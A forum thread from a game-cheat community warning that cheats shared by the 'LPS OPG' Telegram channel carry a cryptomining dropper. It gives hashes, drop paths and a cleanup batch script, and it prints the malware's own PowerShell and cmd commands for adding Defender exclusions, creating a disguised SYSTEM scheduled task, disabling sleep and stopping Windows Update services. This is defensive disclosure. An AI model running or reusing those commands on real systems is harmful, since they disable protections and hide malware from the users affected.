What's new

Welcome to HvH Forum!

SignUp Now! Download Free HvH CS2/CS:GO Cheats, CFG, LUA/JS Scripts, And More!


SignUp Now!

Announcement Beware of LPS OPG Telegram with free cheats, MALWARE ALERT🚨

For a quick Summary check the end of the thread but you can read everything if you want to understand how it works

LPS OPG is Telegram Channel with a lot of interesting up to date cheats for CS2, perfect place to spread some malwares.

What type of malwares are we talking about?
this is quite simple dropper malware that will drop crypto mining software with few extra steps

Here is a detailed explanation of what it does:

Aimstart cheat hash: 39ebcdbb6993787be2ed9d2b6668b9ee2707ca483a66b51d1302bfc610ba021b
update.exe malware hash: 6d0ed15571983f2abdf431ee8246499dc072d686d347c804ab8d08aaa5ab16f3

At first we can see that the cheat file in that particular example is a custom Aimstart from LPS OPG Telegram that will drop
Code:
C:\Program Files\Microsoft\Edge\updater.exe

Also the cheat is dropping besides that Aimstar.exe and AimStar-Ring3.exe in the temp folder
Code:
C:\Users\Admin\AppData\Local\Temp\Aimstar\Aimstar.exe
Code:
C:\Users\Admin\AppData\Local\Temp\AimStar-Ring3.exe

Aimstar.exe in that particular example from the temp folder seems to be main payload, this is because it will...

1. Run a Defender exclusion rule, so defender won't detect and remove the malware
Code:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

2. Create a Scheduled Task as persistence for updater.exe that is in Microsoft Edge folder
Code:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lfvbfbo#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'MicrosoftEdge' /tr '''C:\Program Files\Microsoft\Edge\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Microsoft\Edge\updater.exe')  -Trigger (New-ScheduledTaskTrigger -AtStartup)  -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000))  -TaskName 'MicrosoftEdge' -User 'System' -RunLevel 'Highest' -Force; }
This particular PowerShell commend will create task that will be executed every startup of the system, it will execute fake updater.exe in Edge folder.

3. Also we can see that the file is trying to maximize mining capacity by turning off hibernation and standby modes.
Code:
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

4. Finial thing that we can observe are those cmd commands that will turn off Windows updates
Code:
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

This is what Aimstar.exe from temp folder seems to do, but also AimStar-Ring3.exe from temp folder seems to drop another update.exe file in
Code:
C:\Windows\system32\updater.exe

This particular file seems to do same thing as Aimstar.exe from temp folder, and update.exe from Edge folder, why is that I have no idea, but the hash of these files are the same.

Also there is network connection to pool.hashvault.pro showing that this particular malware is just for cryptojacking.

This is one example from Aimstart cheat, but there are more cheats that do same thing, but depending on cheat implementation seems to be a bit different. Same thing can be seen in Aimware free, euphoria, Airflow, Paradies, thus we can assume that every cheat on this telegram is dropper with malware for cryptojacking.

1743619037924.png

Links to tria.ge

Dropped update.exe file, can be seen in every cheat:

Aimstart:

Aimware free:

Euphoria:

Airflow:

It is also important to mention that this telegram is pointing to other telegrams with cheats to CS:GO and Deadlock, thus be careful from where you download other cheats as well!!! Since it might below the the same person.
1743622336244.png

How can i remove this malware?!?

If you executed any of these cheats, just run this .bat script below ( copy paste it into a file), it will remove the main payload,scheduled task that runs the main payload and also it will remove the Defender exclusion rule created by this malware.

Code:
@echo off
echo Checking for administrator privileges...

net session >nul 2>&1
if %errorlevel% neq 0 (
    echo This script requires administrator privileges.
    echo Please right-click and select "Run as administrator".
    pause
    exit /b 1
)

echo Running with administrator privileges.

echo Killing all update.exe processes...
taskkill /F /IM update.exe /T

echo Removing files...
if exist "C:\Program Files\Microsoft\Edge\updater.exe" (
    del /F /Q "C:\Program Files\Microsoft\Edge\updater.exe"
    echo Removed C:\Program Files\Microsoft\Edge\updater.exe
) else (
    echo C:\Program Files\Microsoft\Edge\updater.exe not found.
)

if exist "C:\Windows\system32\updater.exe" (
    del /F /Q "C:\Windows\system32\updater.exe"
    echo Removed C:\Windows\system32\updater.exe
) else (
    echo C:\Windows\system32\updater.exe not found.
)

echo Removing scheduled task MicrosoftEdge...
schtasks /Query /TN "MicrosoftEdge" >nul 2>&1
if %errorlevel% equ 0 (
    schtasks /Delete /TN "MicrosoftEdge" /F
    echo Scheduled task MicrosoftEdge removed.
) else (
    echo Scheduled task MicrosoftEdge not found.
)

echo Removing exclusion rules...
powershell.exe -Command "Remove-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force"
echo Exclusion rules removed.

echo All operations completed.
pause

Quick Summary

The Released files by LPS OPG are simply Stolen from other sources and then rereleased with a Crypto miner bundled,
Its connecting to pool.hashvault.pro a crypto pool for people mining Monero and other coins.

So never trust any files from their group or any groups that they link to !

Clowning of the malware

1. It uses a Defender exclusion rule which will not work for any External Antivirus solutions
2. Stopping Windows Updates
3. They have almost non existent analysing protection like no anti-vm etc

Summary: Basic, detectable, only causes minor slowdown & power cost
 
Newbie HvHer
User ID
135305
Messages
1
Reactions
0
Level
0
2. Stopping Windows Updates but only for people who never reboot 😂 ( reboot fixes it )
I'm not really sure about that, won't the Windows Updates cmds run on startup? Because there is persistance, and the payload (with windows Updates cmds) will be run again.
Correct me if I'm wrong but I think that's incorrect.
 
I'm not Plisskien
Administrator
User ID
1
Messages
1,487
Reactions
3,912
Level
99
I'm not really sure about that, won't the Windows Updates cmds run on startup? Because there is persistance, and the payload (with windows Updates cmds) will be run again.
Correct me if I'm wrong but I think that's incorrect.
Oh this is correct, if we have payload that will run it every time, then MRT won't be executed and updated, but I won't be surprised if there is another extra security measure that will keep these service running, like updates are critical part of windows.
 
tHe Costarican S1mple
User ID
110428
Messages
92
Reactions
7
Level
6
LPS OPG is Telegram Channel with a lot of interesting up to date cheats for CS2, perfect place to spread some malwares.

What type of malwares are we talking about?
this is quite simple dropper malware that will drop crypto mining software with few extra steps

Here is a detailed explanation of what it does:



At first we can see that the cheat file in that particular example is a custom Aimstart from LPS OPG Telegram that will drop
Code:
C:\Program Files\Microsoft\Edge\updater.exe

Also the cheat is dropping besides that Aimstar.exe and AimStar-Ring3.exe in the temp folder
Code:
C:\Users\Admin\AppData\Local\Temp\Aimstar\Aimstar.exe
Code:
C:\Users\Admin\AppData\Local\Temp\AimStar-Ring3.exe

Aimstar.exe in that particular example from the temp folder seems to be main payload, this is because it will...

1. Run a Defender exclusion rule, so defender won't detect and remove the malware
Code:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

2. Create a Scheduled Task as persistence for updater.exe that is in Microsoft Edge folder
Code:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lfvbfbo#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'MicrosoftEdge' /tr '''C:\Program Files\Microsoft\Edge\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Microsoft\Edge\updater.exe')  -Trigger (New-ScheduledTaskTrigger -AtStartup)  -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000))  -TaskName 'MicrosoftEdge' -User 'System' -RunLevel 'Highest' -Force; }
This particular PowerShell commend will create task that will be executed every startup of the system, it will execute fake updater.exe in Edge folder.

3. Also we can see that the file is trying to maximize mining capacity by turning off hibernation and standby modes.
Code:
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

4. Finial thing that we can observe are those cmd commands that will turn off Windows updates
Code:
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

This is what Aimstar.exe from temp folder seems to do, but also AimStar-Ring3.exe from temp folder seems to drop another update.exe file in
Code:
C:\Windows\system32\updater.exe

This particular file seems to do same thing as Aimstar.exe from temp folder, and update.exe from Edge folder, why is that I have no idea, but the hash of these files are the same.

Also there is network connection to pool.hashvault.pro showing that this particular malware is just for cryptojacking.

This is one example from Aimstart cheat, but there are more cheats that do same thing, but depending on cheat implementation seems to be a bit different. Same thing can be seen in Aimware free, euphoria, Airflow, Paradies, thus we can assume that every cheat on this telegram is dropper with malware for cryptojacking.

View attachment 9209

Links to tria.ge

Dropped update.exe file, can be seen in every cheat:

Aimstart:

Aimware free:

Euphoria:

Airflow:

It is also important to mention that this telegram is pointing to other telegrams with cheats to CS:GO and Deadlock, thus be careful from where you download other cheats as well!!! Since it might below the the same person.
View attachment 9210

How can i remove this malware?!?

If you executed any of these cheats, just run this .bat script below ( copy paste it into a file), it will remove the main payload,scheduled task that runs the main payload and also it will remove the Defender exclusion rule created by this malware.

Code:
@echo off
echo Checking for administrator privileges...

net session >nul 2>&1
if %errorlevel% neq 0 (
    echo This script requires administrator privileges.
    echo Please right-click and select "Run as administrator".
    pause
    exit /b 1
)

echo Running with administrator privileges.

echo Killing all update.exe processes...
taskkill /F /IM update.exe /T

echo Removing files...
if exist "C:\Program Files\Microsoft\Edge\updater.exe" (
    del /F /Q "C:\Program Files\Microsoft\Edge\updater.exe"
    echo Removed C:\Program Files\Microsoft\Edge\updater.exe
) else (
    echo C:\Program Files\Microsoft\Edge\updater.exe not found.
)

if exist "C:\Windows\system32\updater.exe" (
    del /F /Q "C:\Windows\system32\updater.exe"
    echo Removed C:\Windows\system32\updater.exe
) else (
    echo C:\Windows\system32\updater.exe not found.
)

echo Removing scheduled task MicrosoftEdge...
schtasks /Query /TN "MicrosoftEdge" >nul 2>&1
if %errorlevel% equ 0 (
    schtasks /Delete /TN "MicrosoftEdge" /F
    echo Scheduled task MicrosoftEdge removed.
) else (
    echo Scheduled task MicrosoftEdge not found.
)

echo Removing exclusion rules...
powershell.exe -Command "Remove-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force"
echo Exclusion rules removed.

echo All operations completed.
pause

Quick Summary

The Released files by LPS OPG are simply Stolen from other sources and then rereleased with a Crypto miner bundled,
Its connecting to pool.hashvault.pro a crypto pool for people mining Monero and other coins.

So never trust any files from their group or any groups that they link to !

Clowning of the malware

1. It uses a Defender exclusion rule which will not work for any External Antivirus solutions
2. Stopping Windows Updates
3. They have almost non existent analysing protection like no anti-vm etc

Summary: Basic, detectable, only causes minor slowdown & power cost
im remember to use weave.su cs2 free and thats is a such information to exposed that lps opg team
 
Newbie HvHer
User ID
5017
Messages
11
Reactions
4
Level
1
Their releases always seemed sketchy, like one of those many scam YouTube channels that people download obvious malware from - I also inspected this around November 2023 on a spare computer with some common apps downloaded. It seems that from whatever garbage I chose to download from them, it seemed to package an injector which also connects to discords CDN (could be trying to load an image? Very odd nonetheless) Just wanted to offer up some extra info if it's possibly helpful (image shows both a real instance of extreme injector and their 'special' one)
So they've been doing this a while.. yeah...
Although they seemed to use a different exe for their connection, it's probably the same
Good post Plisskien, stay safe all!
20250403_071014.png
 
Last edited:
Famous hvher (no cap)
Forum Contributor
User ID
15827
Messages
563
Reactions
194
Level
56
This mf was sus for like years bruh he banned me when I told him he a little bitch
 

Create an account or login to comment

You must be a member in order to leave a comment

Create account

Create an account on our community. It's easy!

Log in

Already have an account? Log in here.

Top